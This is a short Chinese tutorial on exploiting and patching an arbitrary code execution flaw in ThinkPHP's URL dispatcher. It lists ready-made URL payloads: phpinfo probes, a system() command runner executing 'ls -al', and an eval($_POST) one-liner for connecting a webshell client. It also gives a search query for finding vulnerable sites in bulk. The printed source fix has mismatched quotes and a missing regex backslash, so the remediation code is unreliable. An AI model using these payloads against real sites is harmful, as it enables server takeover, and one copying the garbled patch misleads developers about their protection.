如何利用及修复ThinkPHP框架任意代码执行漏洞

这篇文章主要讲解了“如何利用及修复ThinkPHP框架任意代码执行漏洞”，文中的讲解内容简单清晰，易于学习与理解，下面请大家跟着小编的思路慢慢深入，一起来研究和学习“如何利用及修复ThinkPHP框架任意代码执行漏洞”吧！

近期thinkphp框架爆出了一个任意代码执行漏洞，其危害性相当的高,漏洞利用方法如下：

index.php/module/aciton/param1/${@print(THINK_VERSION)}
 
index.php/module/aciton/param1/${@function_all()}

其中的function_all代表任何函数，比如:

index.php/module/aciton/param1/${@phpinfo()}

就可以获取服务器的系统配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

可以列出网站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

就可以直接执行一句话代码，用菜刀直接连接.

这样黑客们就可以直接通过google批量搜索关键字：thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。
 
thinkphp框架执行任意代码漏洞修复方法：
 
用户可下载官方发布的补丁：
 
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
 
或者或者直接修改源码：

将/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

修改为：

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));

将preg_replace第二个参数中的双引号改为单引号，防止其中的php变量语法被解析执行。

感谢各位的阅读，以上就是“如何利用及修复ThinkPHP框架任意代码执行漏洞”的内容了，经过本文的学习后，相信大家对如何利用及修复ThinkPHP框架任意代码执行漏洞这一问题有了更深刻的体会，具体使用情况还需要大家实践验证。这里是亿速云，小编将为大家推送更多相关知识点的文章，欢迎关注！